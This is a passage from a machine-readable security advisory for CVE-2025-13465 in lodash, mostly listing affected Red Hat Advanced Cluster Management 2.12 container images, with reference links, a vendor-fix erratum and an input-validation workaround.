"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "RHBZ#2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
}
],
"release_date": "2026-01-21T19:05:28.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:07:27+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5633"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
